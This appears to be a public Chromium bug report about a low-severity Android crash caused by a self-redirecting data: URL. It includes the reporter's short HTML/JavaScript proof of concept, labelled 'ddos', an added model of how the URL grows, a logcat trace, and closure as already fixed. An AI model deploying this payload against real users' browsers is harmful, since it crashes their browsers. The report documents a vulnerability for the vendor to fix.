
Issue 678950 link

Starred by 2 users

Issue metadata

Status: WontFix
Owner:
Left Chrome team
Closed: Jan 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 2
Type: Bug-Security




Security: Infinite redirects with long URL can cause browser crash

Reported by pig.wi...@gmail.com, Jan 6 2017

Issue description


VULNERABILITY DETAILS
Chrome browser crash on the Android platform through --->

<html>
<!-- Proof of concept as posted: on every load the page appends '?' plus the current URL split into characters (an array coerced to a comma-joined string), so the URL triples on each self-redirect and the loop never terminates. -->
<a href="data:text/html;charset=utf-8,<script>window.location+='?'+window.location.toString().split('');</script>">ddos</a>
</html>

Similar to report -----> https://bugs.chromium.org/p/chromium/issues/detail?id=33952

VERSION
Chrome Version: [55.0.2883.91] + [stable]
Operating System: [android 5.1.1]

REPRODUCTION CASE

Go to www.tiks.host-ed.me, then click on spoof.html, then click on the link (ddos) and the browser crashes.

Type of crash: [browser]
Crash State: "Unfortunately, Chrome has stopped"

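The following is an added example, not code from the bug report or from Chromium. It models the growth of the PoC's URL per redirect hop and checks it against Android's Binder transaction buffer, which the platform documents as 1 MB per process (the limit behind TransactionTooLargeException). The guard function is hypothetical and is not the Chromium fix referred to later in this thread; the 2-bytes-per-character estimate is only a lower bound on the parcel size, since Java strings are marshalled as UTF-16 and the Intent carries more than the URL.

```javascript
// Added example (not from the bug report or Chromium): why the "infinite"
// redirect in the PoC stops being a redirect loop and becomes an oversized
// Binder transaction after a handful of hops.

// One hop of the PoC: location += '?' + location.toString().split('')
// Array-to-string coercion joins the characters with commas, so a URL of
// length L becomes L + 1 + (2L - 1) = 3L characters: the URL triples per hop.
function nextUrl(url) {
  return url + '?' + url.split('');
}

// Android documents the Binder transaction buffer as 1 MB per process.
// Assumption: 1 MiB is used as the ceiling here.
const BINDER_BUFFER_BYTES = 1 << 20;

// Java Strings travel through a Parcel as UTF-16, so 2 bytes per code unit is
// a lower bound on what the Intent contributes (the real parcel is larger).
function parcelBytesLowerBound(url) {
  return url.length * 2;
}

// Number of hops until the URL alone would no longer fit in the Binder buffer.
function hopsUntilTooLarge(startUrl, limitBytes = BINDER_BUFFER_BYTES) {
  let url = startUrl;
  let hops = 0;
  while (parcelBytesLowerBound(url) <= limitBytes) {
    url = nextUrl(url);
    hops += 1;
  }
  return hops;
}

// Hypothetical guard (not Chromium's actual fix): decide up front whether a
// URL can be handed to the package manager at all, instead of letting
// queryIntentActivities() throw TransactionTooLargeException mid-navigation.
function shouldQueryExternalHandlers(url, limitBytes = BINDER_BUFFER_BYTES) {
  if (parcelBytesLowerBound(url) > limitBytes) {
    return { query: false, reason: `URL of ${url.length} chars cannot fit in a Binder transaction` };
  }
  return { query: true, reason: 'ok' };
}

// Constructed sample: the PoC's own start URL. The stack trace in this issue
// shows ExternalNavigationHandler consulting the package manager on each
// navigation, which is where the oversized URL reaches Binder.
const POC_URL = "data:text/html;charset=utf-8,<script>window.location+='?'+window.location.toString().split('');</script>";

if (typeof require !== 'undefined' && require.main === module) {
  console.log('start URL length:', POC_URL.length);
  console.log('hops until the URL exceeds the Binder ceiling:', hopsUntilTooLarge(POC_URL));
  let u = POC_URL;
  for (let i = 0; i < 10; i++) {
    u = nextUrl(u);
    console.log(`hop ${i + 1}: ${u.length} chars ->`, shouldQueryExternalHandlers(u));
  }
}
```

Run with node to see the per-hop lengths. Starting from the roughly 100-character data: URL, the eighth hop already exceeds 1 MiB of UTF-16 on this lower-bound estimate, which matches the thread's observation that the platform call fails with a multi-megabyte parcel rather than the browser spinning indefinitely.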
 
Cc: yfried...@chromium.org
Components: UI>Browser>Navigation
Labels: Security_Severity-Low M-57 Security_Impact-Stable OS-Android
Owner: mariakho...@chromium.org
Status: Assigned (was: Unconfirmed)
I don't get a browser crash on 57.0.2954.0 with an internal-master Android build, but I do get an exception:

01-09 16:35:57.206 26487 26487 E cr_IntentUtils: java.lang.RuntimeException: android.os.TransactionTooLargeException: data parcel size 4102536 bytes
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ApplicationPackageManager.queryIntentActivitiesAsUser(ApplicationPackageManager.java:835)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ApplicationPackageManager.queryIntentActivities(ApplicationPackageManager.java:817)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.externalnav.ExternalNavigationDelegateImpl.queryIntentActivities(ExternalNavigationDelegateImpl.java:231)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.externalnav.ExternalNavigationHandler.shouldOverrideUrlLoadingInternal$5166USJ75THMGSJFDLKNAR9FCDK74RRDCKNM4SJFETPMASHFCLS78PBIDPGMORJ1EONKAU3KCLP6SOBC9PGNCQB7C5Q6IRREA1GN4OBDECTKOOBECHP6UQB45THMURJKCLN78BQ9DPQ6ARJK7DD4OQJ1EPGIUR31DPJIUKRKE9KMSPPR5566USJ75THMGSJFDLKNAR9FCDK74RRDCKNM4SJFETPMASHFCLS78PBIDPGMORJ1EONKAU3KCLP6SOBC9PGNCQB7C5Q6IRRE91GMSP3CCLP28JRMCLP74QB4CLAN4R2CDTGM8QBECT96ASRLDHQ3M___(ExternalNavigationHandler.java:323)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.externalnav.ExternalNavigationHandler.shouldOverrideUrlLoading$5166USJ75THMGSJFDLKNAR9FCDK74RRDCKNM4SJFETPMASHFCLS78PBIDPGMORJ1EONKAU3KCLP6SOBC9PGNCQB7C5Q6IRREA1GN4OBDECTIIJ3FE9JIUOR8E9NMQQBLDKNM6Q3IDTMMABR2E9NNESR5E8NMAU3KCLP6SOBCDPGNCBQ5F1Q6ASJEC5M4SOBMD5JM2T39DTN4GOBECHM6ASH49TR6ASJID5I6ALBIDH66UOB4D5N6EKJ5EDQMOT1R(ExternalNavigationHandler.java:121)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.chrome.browser.tab.InterceptNavigationDelegateImpl.shouldIgnoreNavigation(InterceptNavigationDelegateImpl.java:112)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.base.SystemMessageHandler.nativeDoRunLoopOnce(Native Method)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at org.chromium.base.SystemMessageHandler.handleMessage(SystemMessageHandler.java:41)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.Handler.dispatchMessage(Handler.java:102)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.Looper.loop(Looper.java:154)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ActivityThread.main(ActivityThread.java:6232)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at java.lang.reflect.Method.invoke(Native Method)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:223)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:733)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils: Caused by: android.os.TransactionTooLargeException: data parcel size 4102536 bytes
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.BinderProxy.transactNative(Native Method)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.os.BinderProxy.transact(Binder.java:692)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.content.pm.IPackageManager$Stub$Proxy.queryIntentActivities(IPackageManager.java:3306)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        at android.app.ApplicationPackageManager.queryIntentActivitiesAsUser(ApplicationPackageManager.java:827)
01-09 16:35:57.206 26487 26487 E cr_IntentUtils:        ... 13 more

Comment 2 by pig.wi...@gmail.com, Jan 10 2017

Yes, I can confirm the exception occurring in 57.0.2954.0.

Comment 3 by sheriffbot@chromium.org, Jan 10 2017

Labels: Pri-2

Comment 4 by pig.wi...@gmail.com, Jan 13 2017

Any updates?
Cc: tedc...@chromium.org
Status: WontFix (was: Assigned)
This is already fixed in M-56 (going stable at the end of January) by Ted. The exception in logcat is just a printed FYI -- we are unable to call system APIs with such a long URL. The exception is caught and handled.

Comment 6 by sheriffbot@chromium.org, Apr 28 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
